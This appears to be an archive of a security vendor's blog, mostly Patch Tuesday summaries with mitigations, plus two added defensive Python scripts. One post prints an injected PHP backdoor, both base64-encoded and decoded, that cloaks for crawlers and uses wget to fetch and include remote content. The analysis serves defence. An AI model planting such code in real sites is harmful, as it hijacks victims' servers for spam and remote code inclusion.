Friday, May 22, 2009

Return of the ThreatCenter blog

We've been dormant for a while, but it's time to bring back the ThreatCenter blog. eSoft's work in the web security area (identification of malicious/compromised websites, not securing of web servers) has produced amazing results in huge volumes, and it's time to share some of these results back with the greater community.

We recently shared some data on a few days' worth of fraudulent pharmacy sites with Richard Stiennon, who published the information on his ThreatChaos blog (if you haven't read the article, please check it out -- and Digg it while you're there). eSoft is seeing these sites at an increasing rate that is fairly staggering.

In our next post, we'll show some of the uglier examples of what we call "pagerank bombs" -- compromised sites used to host hidden links rather than malware.

Tuesday, November 11, 2008

Compromised Sites Boost PageRank for Porn

A recent analysis of a compromised web site by eSoft's Threat Prevention Team led to the discovery of hidden links designed only to show up when viewed by web crawlers such as those used by Google, Microsoft and Yahoo.

The website reviewed, dancescape.tv, appears perfectly normal when viewed from standard browsers, but some PHP code has been injected that gives a long series of links designed to bump the PageRank of certain sites when viewed by a crawler.

The PHP code in question looks like this:


eval(base64_decode("aWYgKChlcmVnaSgiYm90IiwgJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSBvciBlcmVnaSgidXJwIiwgJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSBvciBlcmVnaSgibXNuIiwgJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSkpIHsgc3lzdGVtKCJ3Z2V0IC1PIC90bXAvZ2V0aW5jbC50eHQgaHR0cDovL3B1YmxpY3NudWRlLmNvbS90ZW1wL2luY2wudHh0Iik7aW5jbHVkZSgiL3RtcC9nZXRpbmNsLnR4dCIpOyB9"));


which decodes to this:


if ((eregi("bot", $_SERVER["HTTP_USER_AGENT"]) or eregi("urp", $_SERVER["HTTP_USER_AGENT"]) or eregi("msn", $_SERVER["HTTP_USER_AGENT"]))) { // only runs for crawler user agents ("urp" matches Yahoo! Slurp)
    system("wget -O /tmp/getincl.txt http://[redacted].com/temp/incl.txt"); // fetch the hidden-link block from a remote host
    include("/tmp/getincl.txt"); // and render it into the page
}


When viewing the page with a user agent of googlebot, you get a lot of links that weren't there before. Here's a screenshot of one of the less offensive examples:

[Screenshot: Picture 1.png]


In other instances, a ton of porn links and text are displayed instead of the pharmaceutical links shown here.
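As an added defender-side example (not code from the original post), here is a small Python triage script that finds eval(base64_decode(...)) wrappers in PHP source, decodes them, and flags the tell-tale pieces of a crawler-cloaking injection like the one above; the PHP it scans is a constructed sample with a placeholder host.

```python
import base64
import re

# eval(base64_decode("...")) with either quote style; whitespace inside the blob is tolerated.
_ENCODED_EVAL = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*(["'])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)""",
    re.IGNORECASE,
)

# What a crawler-cloaking injection typically needs: a User-Agent test, a crawler
# keyword, a download of remote content, and inclusion of that content from /tmp.
_INDICATORS = {
    "ua_cloaking": re.compile(r"HTTP_USER_AGENT", re.IGNORECASE),
    "crawler_match": re.compile(
        r"\b(?:eregi|preg_match|stripos|strpos)\s*\([^)]*(?:bot|urp|slurp|msn|google)",
        re.IGNORECASE),
    "remote_fetch": re.compile(
        r"\b(?:system|exec|shell_exec|passthru|popen)\s*\(\s*[\"'](?:wget|curl)\b",
        re.IGNORECASE),
    "include_tmp": re.compile(r"\b(?:include|require)(?:_once)?\s*\(\s*[\"']/tmp/", re.IGNORECASE),
}


def decode_encoded_evals(source: str) -> list[str]:
    """Return the plaintext of every eval(base64_decode("...")) in PHP source; bad blobs are skipped."""
    payloads = []
    for m in _ENCODED_EVAL.finditer(source):
        blob = re.sub(r"\s+", "", m.group(2))
        try:
            payloads.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
    return payloads


def triage(payload: str) -> set[str]:
    """Label which cloaking indicators a decoded payload exhibits."""
    return {label for label, rx in _INDICATORS.items() if rx.search(payload)}


def scan_php(source: str) -> list[dict]:
    """Decode every encoded eval in a PHP file and triage each one."""
    return [{"payload": p, "indicators": triage(p)} for p in decode_encoded_evals(source)]


# Constructed sample modelled on the injection above, with a placeholder host.
SAMPLE_PAYLOAD = (
    'if ((eregi("bot", $_SERVER["HTTP_USER_AGENT"]) or eregi("urp", $_SERVER["HTTP_USER_AGENT"]))) { '
    'system("wget -O /tmp/getincl.txt http://attacker.invalid/temp/incl.txt"); '
    'include("/tmp/getincl.txt"); }'
)
SAMPLE_PHP = (
    '<?php\n// legitimate template code ...\necho "Welcome";\n'
    'eval(base64_decode("' + base64.b64encode(SAMPLE_PAYLOAD.encode()).decode() + '"));\n'
)

if __name__ == "__main__":
    for hit in scan_php(SAMPLE_PHP):
        print(sorted(hit["indicators"]))
        print(hit["payload"])
```

Run it over a site's PHP tree (for example, every file under the document root) and review any hit that carries more than one indicator first.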

This illustrates the trend from open compromise to covert compromise. Most malware already tries to hide itself; web site defacements also seem to be a thing of the past, as compromised sites are used more and more for relaying attacks and for stealthier, income-earning purposes.

Friday, October 24, 2008

Malware scanning for different gateways

Recently eSoft's Threatlabs found an increase in malware using the UPnP/SSDP protocols to find new gateways out of a network. It appears that the effectiveness and increased use of IPS have affected bot maintainers, and their answer is to find another gateway: they now send UPnP discovery packets to locate other gateways on the local network. If you are an IT manager, be sure you know where all the exits from your network are.

Microsoft out-of-band release

It's been a long time since our last post, but this week's activity warrants one. Yesterday, Microsoft announced a critical update (MS08-067), which was released outside their normal "Patch Tuesday" cycle. It turns out that was a good idea. The patch closes a security hole in how Windows systems communicate with each other. This vulnerability has the potential to be exploited by a worm and spread widely. All users of Windows systems are advised to update as soon as possible.

Tuesday, October 9, 2007

October Patch Tuesday

Microsoft announced there would be 7 advisories on this Patch Tuesday, but we only got 6. It makes you wonder what they held back and why.

That aside, there are a couple of things to know about today's advisories and patches. Here's the breakdown:

  • MS07-055 -- Vulnerability in Kodak Image Viewer Could Allow Remote Code Execution

    The first thing I thought when seeing this is, "how many people have the Kodak Image Viewer installed?" It turns out, a lot. It was installed on all Windows 2000 machines and is still installed on Windows XP machines that were upgraded from Windows 2000.

    This vulnerability is very similar to other extremely critical image handling vulnerabilities that have wreaked havoc on Windows operating systems lately. If you even browse to a folder with a malicious image on a vulnerable machine, the malicious image will be able to execute code on your system. So this impacts anything that displays images from Windows Explorer thumbnails and previews to Internet Explorer and Outlook.

    Microsoft does mention that if you have installed Office 2003, the Kodak Image Viewer may have been replaced by a different image viewer.

    This is a potentially extremely serious vulnerability, but at this time the details for how to exploit it are almost non-existent and there are no exploits in the wild.

  • MS07-056 -- Security Update for Outlook Express and Windows Mail

    This relates to how a URL that starts with nntp:// can be used to point a user to a malicious news server (potentially without user interaction if the URL is used as an image source) that overflows memory and potentially executes arbitrary code.

    The malicious news server must be custom and has to know how to overflow the handler. There are no examples and no exploits in the wild, but there's enough information for someone to create an exploit without undue difficulty. This is definitely a critical issue.

  • MS07-057 -- Cumulative Security Update for Internet Explorer

    This is actually three separate vulnerabilities in JavaScript on Internet Explorer from version 5 through 7. All Windows operating systems including Vista are affected. Two of the vulnerabilities use JavaScript tricks to make a person think they've navigated to a particular website when in fact they haven't. This could be exploited by phishers to trick people into thinking they're legitimately at their bank's website (or paypal, or ebay, etc.). There are several publicly available demonstrations showing how to exploit this. Patch immediately.

    The other issue in this update is a heap overflow caused when a script starts several download attempts of the same file and then frees the memory for those download attempts.

    To alleviate both of these issues, consider using Firefox instead of Internet Explorer and consider trying the NoScript plugin for Firefox.

  • MS07-058 -- Vulnerability in RPC Could Allow Denial of Service

    This vulnerability reminds me a bit of the old ping of death. A specially crafted Windows file-sharing authentication message will cause a computer to spontaneously reboot. Microsoft recommends that people firewall UDP ports 135, 137, 138, and 445, and TCP ports 135, 139, 445, and 593. If you have a gateway firewall, it should block these ports by default. If not, you should strongly consider installing a personal firewall such as ZoneAlarm.

  • MS07-059 -- Vulnerability in Windows SharePoint Services 3.0 and Office SharePoint Server 2007 Could Result in Elevation of Privilege Within the SharePoint Site

    If you use SharePoint, you should be aware that an authenticated user could increase their privileges through a cross-site scripting (XSS) vulnerability. We don't view this as a critical vulnerability.

  • MS07-060 -- Vulnerability in Microsoft Word Could Allow Remote Code Execution

    This incorporates 4 separate vulnerabilities in Word for Windows and for Mac that could be exploited by a malicious Word document. The most serious of these issues is a recurrence of an older vulnerability that most security products have some degree of protection for already.



For the moment, the risks are not terribly high, except for potentially harder to detect phishing attacks. However, exploits for the other vulnerabilities could appear at any time, so users are encouraged to update their systems as soon as possible.

Tuesday, September 11, 2007

September Patch Tuesday relatively minor

Today's Microsoft Patch Tuesday is one of the mildest in memory (excluding the month that Microsoft skipped Patch Tuesday altogether, despite a number of exploits and known vulnerabilities). Of the four vulnerabilities, the MSN Messenger vulnerability is, in our view, the most serious. Microsoft has only rated it as Important because not all versions of MSN Messenger are vulnerable and because users are prompted to upgrade their client when they log on to the MSN Messenger network. Here's the breakdown of each vulnerability:

  • MS07-051 -- Vulnerability in Microsoft Agent Could Allow Remote Code Execution

    This was the only patch today that Microsoft rated as Critical. Microsoft Agent is the same technology as the Microsoft Office paper clip that used to annoy you. Microsoft touts it as a way to spice up web pages with interactive personalities. However, this is not the first vulnerability in Microsoft Agent, and those who visit web pages that use the agent may be at risk. Microsoft recommends disabling the agent by setting the kill bit on the following CLSIDs:
    • D45FD31B-5C6E-11D1-9EC1-00C04FD7081F

    • F5BE8BD2-7DE6-11D0-91FE-00C04FD701A5

    • 4BAC124B-78C8-11D1-B9A8-00C04FD97575

    • D45FD31D-5C6E-11D1-9EC1-00C04FD7081F

    • D45FD31E-5C6E-11D1-9EC1-00C04FD7081F

  • MS07-052 -- Vulnerability in Crystal Reports for Visual Studio Could Allow Remote Code Execution

    This vulnerability is rated Important by Microsoft. Only those with Visual Studio are at risk of exploitation of this flaw. If you aren't using Crystal Reports, Microsoft recommends you uninstall it to minimize your exposure to this flaw.

  • MS07-053 -- Vulnerability in Windows Services for UNIX Could Allow Elevation of Privilege

    This is rated Important by Microsoft. Any computer from Windows 2000 through Windows Server 2003 that runs Windows Services for UNIX is susceptible to a local privilege escalation. As this is not remotely exploitable, the eSoft Threat Prevention Team has not analyzed it in depth.

  • MS07-054 -- Vulnerability in MSN Messenger and Windows Live Messenger Could Allow Remote Code Execution

    This vulnerability is a bit more severe than Microsoft would like you to believe. They have rated this vulnerability as Important, but the eSoft Threat Prevention Team believes it ranks as Critical.

    MSN Messenger 6.2, 7.0, 7.5 and Windows Live Messenger 8.0 are all vulnerable. Detailed instructions on exploiting this vulnerability have been released. In order for an attacker to exploit the vulnerability, they must convince their target to accept either a webcam or video chat invitation. If you disable webcam and video chats in MSN Messenger, you are not vulnerable.

    The good news with this one is that Windows Live Messenger 8.1, released in January of this year, and users of MSN Messenger 7.0.0820, released "recently" are already protected from this vulnerability. Also, users of Microsoft's messenger products should be prompted to upgrade when they log in to their accounts.

    Microsoft recommends blocking Microsoft Messenger traffic until all machines on your network are updated with the latest version of Messenger.



As usual, patch your systems as soon as you can.

Note from the sponsor: eSoft's Intrusion Prevention Softpak can be configured to block all MSN traffic at the gateway. It also blocks websites that use Microsoft Agent as a precaution against the many vulnerabilities in that software.

Tuesday, July 17, 2007

Threat Level Raised

We're raising the threat level in response to the Adobe vulnerability. At this point, the Threat Level is in a cautionary area. We'll raise it again if we start seeing wide-spread exploitation.

Adobe Flash Browser Plugin High Risk Vulnerability

Yesterday, Adobe announced a vulnerability in its Flash Player that could be exploited to run arbitrary code. This vulnerability is cross-browser and cross-platform, and the vulnerable software is installed by default on all recent copies of Windows and OS X.

All users who allow flash content in their browsers are at risk.

This morning we saw the first proof-of-concept exploit, which we fully expect to be the tip of the iceberg. It's likely that we'll see mass exploitation in the next few days.

To protect yourself, the best thing to do is to upgrade your Flash plugin to 9.0.47.0 or later. If you use Firefox, the NoScript plugin will prevent Flash content from running unless you specifically trust the source or grant it temporary permission. NoScript can be annoying, but it's an extremely valuable tool in combating malicious websites.

And, of course, make sure you're running gateway and desktop antivirus and intrusion prevention products that are up-to-date.

We'll keep you posted as we see more.

Note from the sponsor: eSoft's Gateway AntiVirus and Intrusion Prevention Softpaks provide full protection for this vulnerability and provided that protection starting shortly after the announcement of the vulnerability and well before any exploits became public.

Thursday, July 12, 2007

Patch Tuesday and Browser 0-days

After a small pause, Threat Center Live is back. We've been very busy at Threat Center building up our honeypots, honeymonkeys, and other systems for finding live malware and exploits in the wild. We've also been busy tracking down and writing signatures for a variety of vulnerabilities. Here's a rundown of the latest news:

The first (as far as I am aware) cross-*browser* exploit has been discovered. It affects Windows machines with both Internet Explorer and Firefox installed and uses a trick to cause Internet Explorer (and presumably Outlook, Outlook Express, and other programs that use the same engine as IE) to launch Firefox and pass arbitrary JavaScript code to it in a trusted context -- meaning that applications can be launched without any user interaction. There are some good demonstrations of the exploit here and here, and with these examples I think we can expect malicious exploits as early as today. Note that this is a vulnerability in Firefox, but it can only be exploited if someone is using IE despite having Firefox installed.

Next in the security roundup from the last couple of days is Microsoft's July Patch Tuesday. This is the first Patch Tuesday in quite a while in which there were no fixes for Internet Explorer, Outlook, or Outlook Express. However, our series of patches for Microsoft Office products remains uninterrupted. Here's the breakdown of what you need to know:

  • MS07-036 -- Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution

    3 vulnerabilities in Excel can allow a malicious Excel file to execute arbitrary code. Although no proof-of-concept exploits have been released to the public, the eSoft Threat Prevention Team was able to reconstruct an exploit from the information in Microsoft's advisory. We believe this is a serious threat. As always, do not open unsolicited file attachments and keep your antivirus signatures up-to-date. eSoft products have zero day protection for this vulnerability when and if exploits start to circulate.

  • MS07-037 -- Vulnerability in Microsoft Office Publisher Could Allow Remote Code Execution

    Malformed Microsoft Publisher files opened with Publisher 2007 can cause arbitrary code to be executed on a host computer. We recommend blocking .pub files at the gateway to protect against this threat.

  • MS07-038 -- Vulnerability in Windows Vista Firewall Could Allow Information Disclosure

    It appears that this vulnerability could allow an attacker to see what services are running on a machine even if those services are firewalled. The vulnerability involves the encapsulation of IPv6 packets inside IPv4 packets. This kind of traffic cannot be blocked at the firewall as it is legitimate traffic. If you don't use IPv6, then you should follow the directions in Microsoft's advisory to disable Teredo. They offer three different ways to block this traffic, the easiest of which is to use the Vista Firewall to block Teredo packets in and out of a machine.

  • MS07-039 -- Vulnerability in Windows Active Directory Could Allow Remote Code Execution

    Few organizations will allow LDAP access to their Active Directory service through the firewall, so this threat shouldn't be too large for most installations. However, there are always those organizations with non-standard setups, and the insider threat. At this point we don't have enough information to give this a full analysis. No public exploits exist.

  • MS07-040 -- Vulnerabilities in .NET Framework Could Allow Remote Code Execution

    This is in fact three vulnerabilities. Most intrusion prevention systems should have protected against the null-byte vulnerability already in a more generic form. The other two vulnerabilities are a bit more ambiguous as to what programs are vulnerable and how they could be exploited. We're keeping a close eye on this one as a variety of applications use the .NET framework and this could impact many of them.

  • MS07-041 -- Vulnerability in Microsoft Internet Information Services Could Allow Remote Code Execution

    This is in fact a rehash of an older known vulnerability in IIS 5.1 on WinXP SP2. It was previously thought to be only a denial of service issue. Many intrusion prevention systems likely already catch attempts to exploit this vulnerability. The exploit is a specially crafted URL, but as the affected software is very outdated there are probably very few vulnerable installations and therefore a low likelihood of someone developing a working exploit that does more than denial of service.

As usual, follow best security practices and patch your systems as soon as possible.

Note from the sponsor: eSoft's Intrusion Prevention and Gateway AntiVirus Softpaks provide protection against all known exploits of the above vulnerabilities and, for some of the vulnerabilities, all theoretical exploit vectors.

Tuesday, May 8, 2007

Microsoft's May Patch Tuesday

Today is again Microsoft Patch Tuesday, the day on which Microsoft announces patches to a series of vulnerabilities and security researchers scramble to learn as much as possible about the vulnerabilities.

Of the announced issues, here are the ones you should be most concerned about:

  • MS07-024 and MS07-025 -- Vulnerabilities in Microsoft Office Could Allow Remote Code Execution

    4 vulnerabilities affecting mostly Microsoft Word, but also all other applications in the Office suite could be used to compromise your computer if you were to open a malicious Office document. Important to note is that Microsoft Word Viewer and Microsoft Office on the Mac are also vulnerable. It almost goes without saying that you should never open office documents from untrusted sources. And remember, those e-mail forwards from your good friend didn't start with your friend and should be looked at with just as much suspicion as if they came from a total stranger.

  • MS07-026 -- Vulnerabilities in Exchange Server Could Allow Remote Code Execution

    If you run Exchange Server to handle your mail, you need to update it now. There are four separate issues including two Denial of Service (specially crafted e-mail will cause the mail server service to hang or quit), one "information leakage" and one remote code execution.

    The first concern is the remote code execution. This vulnerability relates to malformed MIME-encoded attachments.

    We aren't aware of any exploits at this time and details are still scarce, but that could change very quickly.

    The second concern is the "information leakage." E-mails sent with attached HTML files can cause problems for people using Outlook Web Access -- Microsoft's web-based e-mail reader. Essentially, a malicious script could be run in a trusted context and used to steal login credentials, e-mails, and more. This is a cross-site scripting vulnerability and has been shown in similar cases to be a pretty serious breach of security even though it doesn't allow remote code execution.

  • MS07-027 and MS07-028 -- Internet Explorer Multiple (Six) Remote Code Execution Vulnerabilities

    This is the bread and butter of these Patch Tuesdays: Internet Explorer issues. And despite IE7's enhanced security, it is vulnerable to most of these issues as well. As usual, ActiveX objects are the culprit. Microsoft wanted to allow website designers to be able to write full Windows applications and have them run inside Internet Explorer to create a "rich" web experience. Unfortunately, in doing this, Microsoft made two mistakes: every software component on Microsoft systems can be accessed by a web site. This means that software that wasn't intended to be run in Internet Explorer can be and in many of these cases there are exploitable bugs in the software.

    The usual way to deal with this is to explicitly disable specific ActiveX objects by using their "kill bits." Microsoft has a Knowledge Base article with instructions. Also, you can use the Group Policy Editor to set the kill bits across your entire domain. Here are the recommended "kills" from this batch of updates:

    CLSID                                  DLL            Comments
    D4FE6227-1288-11D0-9097-00AA004254A0   msdauth.dll    Windows Media component
    BE4191FB-59EF-4825-AEFC-109727951E42   chtskdic.dll
    17E3A1C3-EA8A-4970-AF29-7F54610B1D4C   CAPICOM        Provides encryption capabilities to programmers.
    FBAB033B-CDD0-4C5E-81AB-AEA575CD1338   CAPICOM


    Note that there are vulnerabilities being patched here that cannot be addressed by setting these kill bits, so your best bet is to upgrade as soon as possible. But still create policies in the Group Policy Editor in case an unpatched machine finds its way onto your network.

  • MS07-029 -- Vulnerability in Windows DNS RPC Interface Could Allow Remote Code Execution

    We first mentioned this flaw -- and the exploits circulating in the wild -- on April 13th. The flaw has received a lot of press, but isn't a concern for most people. Only Microsoft-based DNS servers running on the Internet without any kind of firewall on them or between them and the Internet are susceptible to an external attack. And if a worm taking advantage of this exploit got into a local network, it would likely not be able to compromise more than one machine. Despite that disclaimer, it's a serious bug that could allow someone to take full control of one of your servers, so this patch is here none too soon. For mitigation details, see the post referenced above.

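To roll the kill bits from the MS07-027/028 table above and from the MS07-051 (Microsoft Agent) list in the September post out to many machines, here is an added Python helper (not from the original posts or from Microsoft) that emits a .reg file for a set of CLSIDs and audits an exported .reg for which kill bits are set; the registry key and the 0x400 Compatibility Flags bit are the documented kill-bit mechanism, and the CLSIDs are the ones quoted in the posts.

```python
import re

# Kill bits live per-CLSID under this key; Compatibility Flags with bit 0x400 set
# tells Internet Explorer never to instantiate the control.
KILLBIT_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility"
KILL_BIT = 0x00000400

_CLSID = re.compile(r"^[0-9A-F]{8}-(?:[0-9A-F]{4}-){3}[0-9A-F]{12}$")

# CLSIDs quoted in the MS07-051 (Microsoft Agent) and MS07-027/028 (IE) write-ups above.
AGENT_CLSIDS = [
    "D45FD31B-5C6E-11D1-9EC1-00C04FD7081F",
    "F5BE8BD2-7DE6-11D0-91FE-00C04FD701A5",
    "4BAC124B-78C8-11D1-B9A8-00C04FD97575",
    "D45FD31D-5C6E-11D1-9EC1-00C04FD7081F",
    "D45FD31E-5C6E-11D1-9EC1-00C04FD7081F",
]
IE_CLSIDS = {
    "D4FE6227-1288-11D0-9097-00AA004254A0": "msdauth.dll (Windows Media component)",
    "BE4191FB-59EF-4825-AEFC-109727951E42": "chtskdic.dll",
    "17E3A1C3-EA8A-4970-AF29-7F54610B1D4C": "CAPICOM",
    "FBAB033B-CDD0-4C5E-81AB-AEA575CD1338": "CAPICOM",
}


def normalize_clsid(clsid: str) -> str:
    """Upper-case, validate and brace a CLSID the way it is keyed in the registry."""
    core = clsid.strip().strip("{}").upper()
    if not _CLSID.match(core):
        raise ValueError(f"not a CLSID: {clsid!r}")
    return "{" + core + "}"


def killbit_reg(clsids, comments=None) -> str:
    """Build a .reg file that sets the kill bit for every CLSID given.

    Any existing Compatibility Flags value is overwritten with 0x400. Import the
    file with regedit (save it as UTF-16 if it is to be double-clicked).
    """
    comments = comments or {}
    lines = ["Windows Registry Editor Version 5.00", ""]
    for clsid in clsids:
        key = normalize_clsid(clsid)
        if comments.get(clsid):
            lines.append(f"; {comments[clsid]}")  # ';' starts a comment in .reg files
        lines.append(f"[{KILLBIT_KEY}\\{key}]")
        lines.append(f'"Compatibility Flags"=dword:{KILL_BIT:08x}')
        lines.append("")
    return "\n".join(lines)


def killbits_in_reg(reg_text: str) -> set[str]:
    """Audit helper: CLSIDs whose kill bit is set in a .reg export of the key above."""
    found, current = set(), None
    key_rx = re.compile(r"^\[" + re.escape(KILLBIT_KEY) + r"\\\{([0-9A-Fa-f-]{36})\}\]$")
    val_rx = re.compile(r'^"Compatibility Flags"=dword:([0-9A-Fa-f]{8})$')
    for line in reg_text.splitlines():
        m = key_rx.match(line)
        if m:
            current = m.group(1).upper()
            continue
        m = val_rx.match(line)
        if m and current and int(m.group(1), 16) & KILL_BIT:
            found.add(current)
    return found


if __name__ == "__main__":
    print(killbit_reg(AGENT_CLSIDS + list(IE_CLSIDS), IE_CLSIDS))
```

Exporting the ActiveX Compatibility key from a host with regedit and feeding the result to killbits_in_reg gives a quick check of which of the recommended kills are actually in place there.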

Bottom line: it's time to update your Windows machines using Windows Update or Microsoft Update. And as always, make sure your intrusion prevention, firewall, and anti-virus products are up-to-date.

Note from the sponsor: a combination of eSoft's Firewall, Intrusion Prevention, and Gateway Anti-Virus products will protect customers from all known exploits of today's announced vulnerabilities.